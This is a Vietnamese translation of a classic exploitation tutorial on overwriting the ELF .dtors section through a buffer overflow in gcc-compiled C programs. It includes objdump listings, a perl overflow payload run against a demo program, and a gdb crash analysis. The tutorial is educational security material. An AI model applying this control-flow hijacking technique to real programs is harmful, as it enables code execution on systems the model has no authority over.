Programming Discussion p6

Chia sẻ: Avsdvvsd Qwdqdad | Ngày: | Loại File: PDF | Số trang:7

0
52
lượt xem
3
download

Programming Discussion p6

Mô tả tài liệu
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Overwriting the .dtors section by Juan M. Bello Rivas Dịch sang tiếng Việt: SeekZero ------------------------------------------------------------------------------Giới thiệu ---------Bài viết này trình bày một cách ngắn gọn một kỹ thuật dùng để chiếm quyền điều khiển và đổi hướng thực thi của một chương trình C được biên dịch bằng gcc.

Chủ đề:
Lưu

Nội dung Text: Programming Discussion p6

  1. Overwriting the .dtors section by Juan M. Bello Rivas Dịch sang tiếng Việt: SeekZero ------------------------------------------------------------------------------- Giới thiệu ---------- Bài viết này trình bày một cách ngắn gọn một kỹ thuật dùng để chiếm quyền điều khiển và đổi hướng thực thi của một chương trình C được biên dịch bằng gcc. Người đọc xem như đã quen thuộc với kỹ thuật tràn bộ đệm cơ bản và định dạng ELF. Tổng quan --------- gcc cung cấp một số kiểu thuộc tính (attributes) cho hàm, đặc biệt hai trong số đó làm chúng ta quan tâm là: cấu tử (constructor) và huỷ tử (destructor). Các thuộc tính này phải được lập trình viên mô tả theo cách tương tự như sau: static void start(void) __attribute__ ((constructor)); static void stop(void) __attribute__ ((destructor)); Hàm với thuộc tính 'constructor' sẽ được thực thi trước hàm main(), trong khi các hàm được khai báo với thuộc tính 'destructor' sẽ được thực thi ngay sau hàm main(). Khi tạo các file thực thi dạng ELF, đặc điểm này sẽ được thể hiện trong hai vùng khác nhau là: .ctors và .dtors. Cả hai vùng sẽ có cách sắp xếp như sau: 0xffffffff ... 0x00000000 LƯU Ý: Nếu bạn muốn biết tường tận về điều này, bạn nên xem mã nguồn gcc-2.95.2/gcc/collect2.c. Bắt đầu từ đây, có một số điểm cần quan tâm: * .ctors và .dtors sẽ được ánh xạ (map) vào không gian bộ nhớ của tiến trình thực thi và mặc định là vùng ghi được. * Các vùng này không bị xoá khi sử dụng lệnh strip(1) với file thực thi * Chúng ta không quan tâm người viết ra chương trình có tạo các hàm làm cấu tử hoặc huỷ tử hay không vì cả hai vùng này cũng đều tồn tại và được ánh xạ vào bộ nhớ.
  2. Khảo sát chi tiết ----------------- Chúng ta sẽ minh họa những gì đã đề cập ở trên. $ cat > yopta.c
  3. . . . 14 .data 0000000c 08049558 08049558 00000558 2**2 CONTENTS, ALLOC, LOAD, DATA 15 .eh_frame 00000004 08049564 08049564 00000564 2**2 CONTENTS, ALLOC, LOAD, DATA 16 .ctors 0000000c 08049568 08049568 00000568 2**2 CONTENTS, ALLOC, LOAD, DATA 17 .dtors 0000000c 08049574 08049574 00000574 2**2 CONTENTS, ALLOC, LOAD, DATA 18 .got 00000024 08049580 08049580 00000580 2**2 CONTENTS, ALLOC, LOAD, DATA . . . $ objdump -s -j .dtors yopta yopta: file format elf32-i386 Contents of section .dtors: 8049574 ffffffff a0840408 00000000 ............ Ta thấy địa chỉ của hàm stop() được lưu trong .dtors như đã đề cập ở trên. Mục đích của chúng ta là khai thác chương trình vì vậy từ đây chúng ta sẽ không quan tâm đến .ctors vì nó thực sự không có ích lợi gì cả. Chúng ta sẽ thử một chương trình bình thường không có các hàm thuộc tính này (được khai báo tường minh): $ cat > bleh.c
  4. exit(EXIT_FAILURE); strcpy(buf, argv[1]); exit(EXIT_SUCCESS); } void bleh(void) { printf("goffio!\n"); } EOF $ gcc -o bleh bleh.c $ ./bleh $ objdump -h bleh . . . 17 .dtors 00000008 0804955c 0804955c 0000055c 2**2 CONTENTS, ALLOC, LOAD, DATA . . . Tốt! .dtors vẫn còn đó dù không có hàm huỷ tử nào được khai báo. Hãy xem nội dung của nó: $ objdump -s -j .dtors bleh bleh: file format elf32-i386 Contents of section .dtors: 804955c ffffffff 00000000 ........ Chỉ có các tag bắt đầu và kết thúc, không có địa chỉ hàm nào được mô tả ở đây. Có thể thấy là hơi kỳ quặc khi ở trên ta khai báo biến "buf" vừa là static lại vừa được khởi trị. Bằng cách này chúng ta sẽ làm buf được lưu trong vùng .data, rất gần với vùng .dtors ta đang nhắm tới. Nhờ đó chúng ta có thể đạt được mục đích dễ dàng bằng cách làm tràn bộ đệm buf. Đây không phải là con đường duy nhất để ghi lên vùng .dtors, gần như mọi cách bạn có thể thực hiện để ghi lên không gian bộ nhớ của tiến trình đều dùng được (tấn công bằng định
  5. dạng chuỗi, strcpy trực tiếp bằng cách trở về hàm libc, làm hỏng malloc chunk, ...). Cách được chọn sử dụng ở đây là một cách đơn giản nhằm để minh hoạ. Mục tiêu bây giờ là làm thế nào có thể thực thi đoạn mã trong hàm bleh() (sẽ không bao giờ được gọi trong điều kiện bình thường) bằng cách tạo một entry trong .dtors trỏ đến nó. Để đạt được điều đó chúng ta sẽ không đụng đến tag bắt đầu và chỉ ghi đè lên tag kết thúc (0x00000000). $ objdump --syms bleh | egrep 'text.*bleh' 080484b0 l F .text 0000001a bleh Có thể thấy hàm bleh() có địa chỉ 0x080484b0. Hãy bắt đầu khai thác lỗ hổng: $ ./bleh `perl -e 'print "A" x 24; print "\xb0\x84\x04\x08";'` goffio! Segmentation fault (core dumped) Thử nghiệm đã thành công như chúng ta mong đợi, nhưng có lẽ tốt hơn là nên xem xét kỹ lưỡng core do tiến trình tạo ra và xem những gì đã bị thay đổi. $ gdb bleh core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"... Core was generated by `./bleh AAAAAAAAAAAAAAAAAAAAAAAA° '. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x40013ed8 in ?? () (gdb) bt #0 0x40013ed8 in ?? () #1 0x8048521 in _fini () #2 0x4003c25a in exit (status=0) at exit.c:57 #3 0x80484a3 in main () #4 0x400339cb in __libc_start_main (main=0x8048460 , argc=2, argv=0xbffff8a4, init=0x80482e0 , fini=0x804850c ,
  6. rtld_fini=0x4000ae60 , stack_end=0xbffff8 9c) at ../sysdeps/generic/libc-start.c:92 (gdb) maintenance info sections Exec file: `/home/rwx/tmp/bleh', file type elf32-i386. . . . 0x0804953c->0x08049550 at 0x0000053c: .data ALLOC LOAD DATA HAS_CONTENTS 0x08049550->0x08049554 at 0x00000550: .eh_frame ALLOC LOAD DATA HAS_CONTENTS 0x08049554->0x0804955c at 0x00000554: .ctors ALLOC LOAD DATA HAS_CONTENTS 0x0804955c->0x08049564 at 0x0000055c: .dtors ALLOC LOAD DATA HAS_CONTENTS 0x08049564->0x0804958c at 0x00000564: .got ALLOC LOAD DATA HAS_CONTENTS . . . Chúng ta sẽ xem xét những gì đã bị ghi đè (gdb) x/x 0x08049550 0x8049550 : 0x41414141 Đây là nội dung của vùng .eh_frame (gcc sử dụng để lưu các con trỏ xử lý biệt lệ (exception) cho các ngôn ngữ có hỗ trợ chúng) (gdb) x/x 0x08049554 0x8049554 : 0x41414141 (gdb) x/8x 0x0804955c 0x804955c : 0x41414141 0x080484b0 0x08049500 0x40013ed0 0x804956c : 0x4000a960 0x400fb550 0x08048 336 0x400338cc (gdb) Như đã thấy, chúng ta không quan tâm đặt tag bắt đầu 0xfffffff ở vị trí tương ứng của nó và điều đó hoàn toàn không cần thiết, chỉ cần đặt địa chỉ của bleh() vào đúng chỗ, chúng ta sẽ làm đoạn mã được thực thi. Cũng lưu ý rằng tiến trình bị segfault ngay sau _fini(), điều này rõ ràng là do nó tiếp tục
  7. tìm đến tag kết thúc (0x00000000) - lúc này đã không còn tồn tại - và nhảy đến các địa chỉ kế tiếp ngay sau địa chỉ của bleh() (các địa chỉ này được xác định trong bảng GOT - Global Offset Table). Kết luận -------- Bài viết đã trình bày một cách khác để thực thi các đoạn shellcode được chèn vào chương trình. Kỹ thuật này có một số ưu điểm: * Nếu file thực thi có thể đọc được, sẽ rất dễ để xác định chính xác vị trí chúng ta muốn ghi vào và trỏ đến đoạn shellcode, chỉ cần xem file thực thi dạng ELF và xác định vị trí của vùng .dtors là đủ. Trong trường hợp này tính tin cậy (khả năng thành công) của trình khai thác lỗi tăng lên đáng kể. * Đơn giản hơn so với các kỹ thuật khác như ghi đè một entry trong bảng GOT. Và những nhược điểm: * Chương trình bị lỗi phải được biên dịch và liên kết bằng GNU gcc * Trong một số trường hợp có thể gặp khó khăn để tìm một nơi để chứa shellcode cho đến khi chương trình thoát ra. Have fun! :) Mulan(HVA)
Đồng bộ tài khoản